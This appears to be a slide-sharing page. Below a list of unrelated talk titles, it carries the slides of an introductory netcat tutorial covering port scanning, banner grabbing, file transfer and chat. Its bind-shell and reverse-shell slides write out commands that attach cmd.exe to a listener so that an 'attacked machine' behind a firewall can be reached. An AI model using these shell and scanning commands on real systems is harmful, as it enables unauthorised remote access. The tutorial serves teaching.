Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Netcat 101 by-mahesh-beema

  • 1. - - by Mahesh Bheema
  • 2.  It is a tool that can read and write data across networks, usingTCP or UDP protocol. It can be operated both in server and client mode.
  • 3.  Port scanning  Banner Grabbing  Backdoor  File transfer  Port Redirector  Chatting and  Many more…
  • 4.  Port scanning is the process of scanning a specified host and looking for ports that may be open or closed.  Here is the syntax to scan ports… # nc -v -z IP_Address port_range -v is for verbosity (without –v it wont display result in output)
  • 5.  Banner grabbing is a technique to determine the service running or application, version, operating system. Using the below syntax : # nc -v IP_Address port  when you hit enter,After a few seconds you see some information about your IP address and port number, then write GET / HTTP/1.1 and hit enter and see some information about your victim.
  • 6.  File transfer/ chat works by setting up a server and client.  FileTransfer  nc –l –p 1234 > testfile.txt [Reciever’s end]  nc IP_Address 1234 < testfile.txt [Sender’s end]  type abc.jpeg | nc –lvp 8080  nc –l Server_IP 8080 > abc.jpeg  Chat Server  nc –l –p 1234 [Reciever’s end]  nc IP_Address 1234 [Sender’s end]
  • 7.  Netcat has the ability of providing a remote shell as well. We can do this in two ways…  1. Bind Shell  2. Reverse Shell
  • 8.  We can take cmd.exe/shell and bind it to a local port, and anyone connecting to this port will be presented with command prompt belonging to that machine.This is known as a BIND SHELL. Syntax as follows…  # nc –l -p 1337 –e cmd.exe [Server]  # nc –v Server_IP 1337 [Client]
  • 9.  Reverse Shell:  Netcat can also "send" a shell to another instance of a listening Netcat session.This is especially useful if the attacked machine is behind a firewall or otherwise nat'ed  # nc –lvp 1337 [Server]  # nc –v Server_IP 1337 –e cmd.exe [Client]
  • 10.  It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺
  • 11.  SpecialThanks to CATechnologies for the venue.